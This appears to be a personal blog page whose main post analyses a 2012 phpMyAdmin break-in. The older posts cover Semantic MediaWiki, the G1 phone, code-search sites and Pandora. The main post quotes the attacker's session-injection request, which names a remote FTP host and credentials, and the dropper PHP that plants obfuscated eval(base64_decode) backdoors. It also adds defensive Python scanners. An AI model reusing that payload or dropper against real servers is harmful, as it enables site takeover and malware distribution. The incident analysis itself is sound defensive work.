Thursday, March 01, 2012

Deconstruction of a Hack

Like any fellow server maintainer out there, I know that I will occasionally be the target of an anonymous person's ire. This week it was my turn. I run an Apache server with PHP for my personal projects, nothing important. I also run a number of apps to help me manage my server, like BASE to monitor my Snort logs (overkill for a personal server, yes I know), and phpMyAdmin to manage the database portion.

I made the mistake of thinking that one of my apps was secure, and the further mistake of not updating it to the most recent version. I blame my busy schedule with school and work for not keeping it more up to date. Today, phpMyAdmin was the culprit.

JIGGLING THE LOCKS

Unfortunately, I left my phpMyAdmin installation off the root, in a directory that wasn't protected with a password; I was foolishly relying on phpMyAdmin's built-in cookie authentication. After the attacker found my installation, it was only a matter of time.

91.224.160.132 - [21/Feb/2012:19:39:36 -0800] "POST /phpmyadmin/config/config.inc.php HTTP/1.1" 404 691
91.224.160.132 - [21/Feb/2012:19:39:36 -0800] "GET /phpmyadmin/ HTTP/1.1" 200 2439
91.224.160.132 - [21/Feb/2012:19:39:36 -0800] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 404 691
91.224.160.132 - [21/Feb/2012:19:39:37 -0800] "POST /phpmyadmin/scripts/signon.php HTTP/1.1" 302 20
91.224.160.132 - [21/Feb/2012:19:39:37 -0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 691
91.224.160.132 - [21/Feb/2012:19:39:37 -0800] "GET /phpmyadmin/index.php HTTP/1.1" 200 2437
91.224.160.132 - [21/Feb/2012:19:39:38 -0800] "GET /phpmyadmin/index.php?session_to_unset=123&token=928b1ea05d6481d9997970f4bcf9af06&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a45%3a%22ftp%3a%2f%2fivan4174%3axuq5ytl9%4092.255.21.29%2fhttpdocs%22%3b%7d%7d HTTP/1.1" 200 20
91.224.160.132 - [21/Feb/2012:19:39:38 -0800] "GET /phpmyadmin/index.php?token=928b1ea05d6481d9997970f4bcf9af06 HTTP/1.1" 200 68
91.224.160.132 - [21/Feb/2012:19:39:45 -0800] "POST /wp-admin/zliiao.php HTTP/1.1" 200 35

One of the more popular exploits seems to be sending PHP script code that will execute if the input isn't cleaned first. This seems to be the case here. I was looking through the source code of phpMyAdmin's index.php to see what could possibly have read this in and executed it, and I eyed one line in particular because it passed the entire $_GET array into it, but I'm not sure if that was it. So I looked around some more. Since the request mentions "PMA_Config", I searched through phpMyAdmin's source for it. Turns out, the webapp.php file uses a _SESSION variable named PMA_Config to tell it the URI for something. This seems like the perfect place to stash a value from an external website that you want to execute, and sure enough, that is exactly what happens.

webapp.php snippet:

$parameters = array(
    'id'         => 'phpMyAdmin@' . $_SERVER['HTTP_HOST'],
    // the PMA_Config object is read back out of the session here
    'uri'        => $_SESSION['PMA_Config']->get('PmaAbsoluteUri'),
    'status'     => 'yes',
    'location'   => 'no',
    'sidebar'    => 'no',
    'navigation' => 'no',
    'icon'       => 'phpMyAdmin',
);


Thankfully, it looks like in the newest version of phpMyAdmin they switched from the $_SESSION array to the $GLOBALS array. Hopefully there aren't any other nasty little surprises inside phpMyAdmin's source.
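As an added example (not code from the original post), here is a small Python log triage script that flags requests trying to write into $_SESSION through the query string, as in the request above, and pulls the "source" URL out of the serialized PMA_Config object so you can see where the server was told to fetch code from. The log lines are constructed samples in the same layout as the log quoted above; the IPs are RFC 5737 documentation addresses and user:pass@203.0.113.9 is a placeholder.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in the same layout as the access log quoted in the post.
# IPs are RFC 5737 documentation addresses; user:pass@203.0.113.9 is a placeholder.
SAMPLE_LOG = """\
198.51.100.7 - [21/Feb/2012:19:39:37 -0800] "GET /phpmyadmin/index.php HTTP/1.1" 200 2437
198.51.100.7 - [21/Feb/2012:19:39:38 -0800] "GET /phpmyadmin/index.php?session_to_unset=123&token=0123456789abcdef&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a36%3a%22ftp%3a%2f%2fuser%3apass%40203.0.113.9%2fhttpdocs%22%3b%7d%7d HTTP/1.1" 200 20
192.0.2.44 - [21/Feb/2012:19:40:01 -0800] "GET /index.php?page=home HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) - \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+')
# Pulls the "source" member out of a PHP-serialized PMA_Config object.
PMA_SOURCE_RE = re.compile(r'O:10:"PMA_Config":\d+:\{.*?s:6:"source";s:\d+:"([^"]*)"', re.S)


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not fit."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def session_keys_in_query(target):
    """Return {decoded_key: [decoded values]} for query parameters aimed at $_SESSION."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k: v for k, v in params.items() if k.startswith('_SESSION[')}


def extract_pma_source(value):
    """Return the injected PMA_Config 'source' URL from a decoded value, or None."""
    m = PMA_SOURCE_RE.search(value)
    return m.group(1) if m else None


def scan_log(text):
    """Return one finding per request that tries to write into $_SESSION."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        hits = session_keys_in_query(entry['target'])
        if not hits:
            continue
        sources = [extract_pma_source(v) for vals in hits.values() for v in vals]
        findings.append({
            'ip': entry['ip'],
            'ts': entry['ts'],
            'keys': sorted(hits),
            'source': next((s for s in sources if s), None),
        })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} wrote {f['keys']} -> remote source {f['source']}")
```

Run it over your own access log by replacing SAMPLE_LOG with the file contents; any hit with a non-empty source is a request that told phpMyAdmin to load configuration from a remote host.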

ON THE INSIDE

What did this nasty little thing do? First it executes some remote PHP code. This code is quite rudimentary: it generates a randomly named file and stuffs it into the first directory it executes in, which in this case happened to be a WordPress directory.

Some of the PHP code it retrieved from the remote site:

$dr = $_SERVER["DOCUMENT_ROOT"];
$ran = rand(5,7);
// build a 5-7 letter lowercase random file name ($i and $sn are never initialised)
for ($i; $i < $ran; $i++) $sn .= chr(rand(97,122));
$sn .= '.php';
// collect the document root and its immediate subdirectories that are writable
$gdarr = array();
if (is_writeable($dr)) $gdarr[] = '';
if ($dir = @opendir($dr)) {
    while (false !== ($file = readdir($dir))) {
        $pfile = $dr.'/'.$file;
        if ($file != '.' && $file != '..') {
            if (is_dir($pfile) && is_writeable($pfile)) $gdarr[] = '/'.$file;
        }
    }
}
if (count($gdarr) == 0) die('');
// pick one of them at random and write the comment-obfuscated payload there
$spn = $gdarr[rand(0,count($gdarr)-1)].'/'.$sn;
$f = fopen($dr.$spn,'w');
fputs($f, "4p_Y*/(/*Y83yi*/base64_decode/*w$9Pr5C*/(/*j!wb*/'Lyo3bGA6LlhFKi9ldmFsLyo1LVRCeSovKC8qOk14VCovYmFzZTY'/*@5[O*/.
(MUCH MORE BASE 64 GIBBERISH...) ");
fclose($f);
// report the dropped file's path back to the caller between marker strings
echo('--start-check'.'string--');
echo($spn);
echo('--end-check'.'string--');
die();


The code then proceeds to place an innocuous-looking eval(base64_decode('5938h4g9838h4g348gherhgusehri... (BASE 64 GIBBERISH)') at the top of each index.php page.
Of course this code is anything but innocuous: it redirects all requests to the root directory, where it has added its own special sauce to the home page to load your browser up with some lovely malware via a Java applet.

All that is required to "re-infect" the host, should the owner remove all the changed .php files, is the small random PHP file the attacker has loaded into a random directory. This file is named with random gibberish as well.

FIGHTING BACK

Unfortunately, without poring through log files, it's difficult to find where this little random PHP file is, especially at first. After looking through thousands of lines of log files, I decided to automate this a bit more and enlisted the help of Process Monitor. This is quite a process-intensive program, as its name implies, so I can only run it for a little while. After running it for a couple of hours, I had accumulated over 32 million events in this thing. Thankfully, the attacker tried to "regenerate" his infectious pages during this time, and that is when I caught the process doing all the badness. It was only a matter of deleting the script and reverting all the files after that. Thankfully the site is stored in Subversion, so I don't have to worry about missing something that was changed.
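As an added example (not from the original post), the scanner below automates the other half of the hunt described above: it walks a web root looking for the two artefacts the post describes, an eval(base64_decode(...)) near the top of a PHP file even when the tokens are split by /*junk*/ comments, and a short random-looking .php file name like the wp-admin/zliiao.php seen in the log. The demo() function builds a constructed web root in a temporary directory; the base64 blob it plants just decodes to a harmless echo.

```python
import os
import re
import tempfile

# Match block comments like the /*Y83yi*/ junk the dropper sprinkles between tokens.
COMMENT_RE = re.compile(r'/\*.*?\*/', re.S)
EVAL_B64_RE = re.compile(r'\beval\s*\(\s*base64_decode\s*\(')
# The dropper names its file with 5-7 random lowercase letters plus ".php".
RANDOM_NAME_RE = re.compile(r'^[a-z]{5,7}\.php$')
# Ordinary names that happen to fit the same shape; extend this for your own app.
KNOWN_NAMES = {'index.php', 'admin.php', 'config.php', 'login.php', 'header.php', 'footer.php'}
HEAD_BYTES = 4096  # the injected eval sits at the top of each index.php


def strip_block_comments(src):
    return COMMENT_RE.sub('', src)


def classify_php_source(rel_path, head):
    """Return the reasons (possibly none) why this file looks like part of the infection."""
    reasons = []
    if EVAL_B64_RE.search(strip_block_comments(head)):
        reasons.append('eval(base64_decode(...)) near top of file')
    name = os.path.basename(rel_path)
    if RANDOM_NAME_RE.match(name) and name not in KNOWN_NAMES:
        reasons.append('short random-looking filename')
    return reasons


def scan_webroot(root):
    """Walk a web root; return sorted [(relative_path, (reason, ...)), ...] for suspicious PHP files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                head = fh.read(HEAD_BYTES).decode('latin-1')
            rel = os.path.relpath(path, root).replace(os.sep, '/')
            reasons = classify_php_source(rel, head)
            if reasons:
                findings.append((rel, tuple(reasons)))
    return sorted(findings)


def _write(path, text):
    with open(path, 'w') as fh:
        fh.write(text)


def demo():
    """Build a constructed web root (one clean file, two infected ones) in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'wp-admin'))
        # Comment-obfuscated eval prepended to a site page, as the post describes.
        _write(os.path.join(root, 'index.php'),
               "<?php /*k1*/eval/*x*/(/*y*/base64_decode/*z*/('ZWNobyAnaGknOw=='));\n<?php echo 'home'; ?>\n")
        # The re-infection dropper with a random name (zliiao.php is the name seen in the post's log).
        _write(os.path.join(root, 'wp-admin', 'zliiao.php'),
               "<?php eval(base64_decode('ZWNobyAnaGknOw=='));\n")
        _write(os.path.join(root, 'wp-admin', 'settings.php'),
               "<?php return array('debug' => false);\n")
        return scan_webroot(root)


if __name__ == '__main__':
    for rel, reasons in demo():
        print(rel, '->', '; '.join(reasons))
```

Point scan_webroot() at your real document root instead of the temp tree; anything flagged on the filename heuristic alone deserves a look at its contents before deleting, since the name check is only a hint.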

CONCLUSION

Keep your apps up to date. And if you don't, make sure they aren't publicly facing.

Saturday, March 21, 2009

My Semantic Experience

Over the past few months I've been focused on learning and developing my knowledge of the wiki-language. This has led to me discovering a rather interesting add-on for Mediawiki called Semantic Mediawiki. This extension is not currently used on Wikipedia as the database resources needed to support it would be rather substantial. Of course the benefits of having access to semantic data on the scale of Wikipedia would be immense, as many have made the case to the Wikipedia founder. One of the interesting things about the Semantic Mediawiki is that when a breadth of information is entered into a semantic wiki, the information can become an integral part in creating new aggregate data, all without duplication of the original data.

So, after that quick intro to the world of Semantic MediaWiki, I figured I would tell you what I've been looking forward to doing with the data. I run an old school pen-and-paper role playing game, adapted for an online environment with a couple of friends. If you aren't familiar with how a role playing game works, just look it up on Google, there's plenty of explanations. In my game, I needed pretty detailed character sheets, to keep track of all the stats and skills of all the players in the game. In order to make sure they weren't cheating, I needed a method that would keep a change history on each document. The wiki format worked great, but then, as many technophile programmers do, I decided I wanted to take advantage of all that data in my wiki, on the character sheet. This has led to a wiki page unlike many I've seen, with auto-completion, drop-downs of sets of pages from certain categories, templates that compute the correct values to be displayed to the user on their page and even some properties used as decorators to give a page multiple values of the same property.

Now, all of that was great, and it made me very happy to have a character sheet that could be filled out in 5 minutes and contain lots of meta-information. The problem I have is that I now need something to let me extract properties from that character sheet outside of MediaWiki, and put them into my own external app to show random numbers to the users (in other words, rolling dice) for the purposes of the game. After working with PHP and XML for a couple of days, I was able to pull down all the data I needed from my wiki and pop it into my dice rolling page. While it wasn't as easy as I thought it would be, I was able to pull down some of the defined semantic properties from the page. However, I'm still working on that dice page; hopefully there will be easier ways to extract wiki data in the future.

My takeaway from the experience so far has been that once you've set up MediaWiki with the Semantic MediaWiki & Semantic Forms extensions, you can really make data entry into your wiki very easy and even have a level of type-safety in your wiki, ensuring data integrity, which anyone can appreciate.

Sunday, November 23, 2008

Playing with the G1 for a couple minutes

After reading many reviews and comparisons of the G1 online, I decided to go out and see if I could find one at a store today. I found a T-Mobile store near where I live and I got my 5-10 minutes with one of these phones.

First Impression: It's bigger than my current phone, but not nearly as big as the many reviews I've read seem to imply. Yes, it's a smart phone with a fold-out keyboard, but it works quite nicely. It's responsive and fun to use. One thing I found quite fun was the little control stick. That's one thing that isn't really explored in depth in most reviews I've seen about the G1.

The little control stick is the alternate control scheme for the G1, for those of you who don't really want to smudge up the screen. I think it's great; maybe it could have been a bit bigger, and maybe a little more durable. The weird thing about it, though, is that it feels as though it's vibrating under your finger, which gives it a strange sensation when using it.

Moving around in the phone is pretty easy once you figure out where all the little buttons are; it's not quite as intuitive as I would like button-wise, but it's still very usable with the touch interface. I think the idea of having multiple means to do things isn't a bad thing.

The camera and picture button are placed in such a way that you might forget where they are if you happen to have the phone in landscape mode with the keyboard out. The pictures taken are good, and the photo responsiveness wasn't that bad either. If taking video isn't that important to you, then the media functionality of the phone is actually quite good. Using YouTube on the phone was cool, but I would rather have embedded Flash support that works with whatever video happens to be embedded on the site; however, I know that is too much to ask for.

Overall, the only thing that did surprise me a bit was the flimsy feel of the foldout keyboard. As most reviewers have stated, it has a certain cheap-plastic feel to it, like it's one step away from busting off, which isn't something I like in a phone that typically needs to go through some wear and tear.

Wednesday, October 25, 2006

Smart and simple does it.

Continuing on the thread of UIs from my last post, I thought I would take on the composition of UIs for usability. Now before I bore you with a lot of web buzzwords, I want you to think back to successful websites. Digg.com, craigslist.com, slashdot.org, and of course google.com, just to name a few. What do these sites have in common? Well for one they are all popular sites that emphasize content over pizzazz. Another thing they all have is a rather smart interface. To understand this completely, let me go over the different aspects of these sites.
  • Digg.com
    • No login required to view all stories and comments.
    • Space between top of page and news stories is small.
    • New stories are organized in a simple and easy to understand list.
    • Clearly delineated sections guide your eye to the important parts.
    • Bold colors are used sparingly and on parts that are actually important, so your eye doesn't have to dart around page to find important points and there are no visual tricks being used to fool you into looking at any specific section.
    • Ads are clearly marked and not mixed in with the important parts.
  • Craigslist.com
    • No login required to view all stories and comments.
    • All important info is right at the top of the front page.
    • Although cluttered with links, the page gives a feeling of looking at a table of contents in a book, and is strangely familiar.
    • No ads. (unique to this site)
    • Everything is laid bare in front of you, not a lot of clicking to find what you need.
  • Slashdot.org
    • No login required to view all stories and comments.
    • Space between top of page and news stories is small.
    • New stories are organized in a simple and easy to understand list.
    • Clearly delineated sections guide your eye to the important parts.
    • Ads are clearly marked and not mixed in with the important parts.
  • Google.com
    • No login required to search web, news groups, news, products, maps and others.
    • Very simple interface, click to results usually very small.
    • Ads are clearly marked and not mixed in with important parts.
    • Clearly delineated sections guide your eye to the important parts.
Obviously marketing, results and word of mouth play a huge role in why all of these sites are popular, not just their interfaces. But let's analyze their general similarities in interfaces for a minute, because if they were hard to use, people wouldn't be using them in droves, as they are.

I think it is interesting looking over popular sites, and although I am not a professional UI expert, I can make conclusions based on my own usage of these sites. What I know is that they are easy and fast to use. I don't like to waste my time with lots of clicking and searching, and the sites listed don't trick you into wasting your time with excessive advertisements and clicking to get at what you want.

I've looked over a few sites, and I can spot a winner simply by comparing it to existing sites in general use. Now what better thing to look at and compare than something near and dear to my heart? I am a programmer, so I'm going to look at some code search engines, such as the recent Google Code Search, and rate them as I see fit.

http://www.google.com/codesearch - 6/10
My first impression of Google Code Search is that the interface is exactly like the Google web search engine, but since code is much more involved than just a simple link to a website, I am a little disappointed. In order to get what I want, I will need to click through a lot of different links. This is made for someone who knows EXACTLY what they want, as the search box lets you use very advanced regular expressions to find it. This gains points simply because Google has a huge code base to draw from.

http://www.krugle.com/ - 8/10
My first impression of Krugle is that they put a lot of work into making the interface usable, yet smart and full featured. After typing in one word and clicking once, I see that the interface is using full-screen Ajax, which doesn't impress me at first, as I've seen this before with disappointing results. However, I find that each result opens a special tab that can be saved, and that a right-hand pane can be opened to show a directory view of the current item. Useful and very quick.

http://www.codefetch.com/ - 4/10 (slow server)
On my first visit to this site, I am thinking immediately that this is a Google Code Search duplicate, but with room for delineation between different programming languages. Interesting, but still not enough to keep me coming back for more. So I try to use this search, and I am very disappointed in the speed at which the results return. The code is shown directly on the search results page, which is unique, but without an interface to view many results in, this site is failing in the usability category.

http://www.snipplr.com/ - 7/10
At first glance, this site looks like del.icio.us for source code, which is a novel idea. Except that this site suffers from what most new sites suffer from: a lack of content. I typed in the word encrypt and it returned 0 results. The concept is good; the code display allows for comments and a description before each code snippet. The code is displayed in the standard numbered list layout, allowing tags to be put on each snippet. However, the tabs at the top are laid out in a confusing way, and the search (which is the most useful thing) is too close to the top and right, where it is inconvenient and you might miss it. The important stuff is there right on the front page, displayed in a most recent/popular format like del.icio.us does. This site only loses points on its speed, but to be fair, del.icio.us is about just as fast as this site.

http://www.koders.com/ - 7/10
Koders was one of the first code search sites I found. Although its layout is similar to Google's minimalist approach, it is TOO minimalist. I want more options for searching. Although it gives an option to search for different licenses of code (something I haven't seen anywhere else), it doesn't give me any great new code searching features. It has another feature that lets you search for class and method definitions. This has the makings of a comprehensive code search site (the search by clicking function names is another example). The speed that Google or Krugle have going for them is definitely lacking here, but that may simply be a matter of infrastructure. This site does seem to have a bigger codebase than any of the previous sites I found. The only drawback I found is that the "Koders" logo and bulky search box are at the top of all pages, which draws attention away from its search.

http://labs.oreilly.com/code/ - 6/10
This page is simple, and it gives me something interesting, "recent searches", which is always useful for the casual code hacker. The search results are a little "bare", with a lot of whitespace that I would rather were used for displaying the important stuff. However, overall it is a satisfying search, as the results display different books with code, and the code display is succinct enough to keep me interested. Although I feel a little biased here, seeing as I find many of O'Reilly's books useful to begin with.

http://www.codase.com/ - 8/10 (slow server)
When I first saw the home page for this code search engine, I thought wow, that looks detailed. It lets me search for code under specific conditions, even by variable names. It lets me choose which language to search in, and gives me rather advanced options to use. However, I ran into problems searching, as the engine or server it is running on is incredibly slow. This engine impressed me with another very useful aspect though: it has a fully searchable API for Java, Windows, Linux, and it looks like some other APIs are in the works to be put online soon. Wow, not only that, but each function and other blocks of code can be toggled open and closed, giving this an advanced IDE feel. This one is by far the most advanced search engine I've seen, and it is too bad that it is running on low-end hardware for what it has. I can't recommend this one simply because it is so slow it is practically unusable.

http://www.csourcesearch.net/ - 6/10
This site has a pretty horrible looking interface, and I would give it at least another point if it wasn't so bad looking. But other than that, it is an interesting Ajax-enabled search that lets you search by different programming characteristics, similar to codase.com, but this one is much faster. I do like the fact that the code is also color coded, and parts of it are clickable. This search is only for C code (if you haven't already guessed), but when you find results, it isn't readily obvious what each of the results is. So without some tweaking of their results page, this is not getting too far in the code searching arena.

Since I've been rating code search engines, I thought it only fair to include an open source code search engine package here: http://gonzui.sourceforge.net/ Gonzui gives anyone with a code base the means to let people on the web search through it. So, you can search on Google for Gonzui and you'll find many very similar websites. The Gonzui interface is just like a cut-and-dried Google search for code, which is what many other sites offer. Of course this has the added benefit of being customizable, as it is open source. A few sites that use Gonzui: http://raa.ruby-lang.org/gonzui/, http://gonzui.cihar.com/, http://xen.begi.net:46984/

It will be interesting to see which code search will win in the end, but I have a feeling that many people will simply use Google regardless of which options are available because they trust it. I don't blame them; Google does a good job of giving you just the important stuff and no fluff. And I'll end with this: if you can make a site, give people the important stuff up front, don't make them click to get it, or else you stand to lose people's interest. That's right, I'm talking to you, Soapbox (http://soapbox.msn.com/). You aren't going to kill YouTube or anyone else anytime soon by protecting your important stuff behind a login page.

Monday, October 16, 2006

The best interface is already here.

Have you ever seen the interface over at Pandora.com? If not, I suggest you go and check it out. The site is a great alternative to radio, but the thing I wanted to focus on was its incredible use of Flash. I am not a Flash developer (yet), but I want to take this opportunity to say that the slick no-page-reloading and not too much of a download make Pandora's website a great one. The ability to sign up from within the Flash applet makes it second to none.

I will see how many more interfaces I can find that use the same one-page-for-all approach. It's pretty funny that in this day and age of everything Ajax that we still have the same old approach to account creation.

I am a programmer, so I have no qualms about creating accounts on the multiple sites that I visit, and thus I am very familiar with the standard account creation routine. What I have found, though, is that most sites use a standard account creation page to make sure that users are tracked, and some (if not all) even track their users before they sign up. My point is this: why don't most sites have an account creation process that is as painless as Pandora's? The technology is there, but for some reason people are not using it.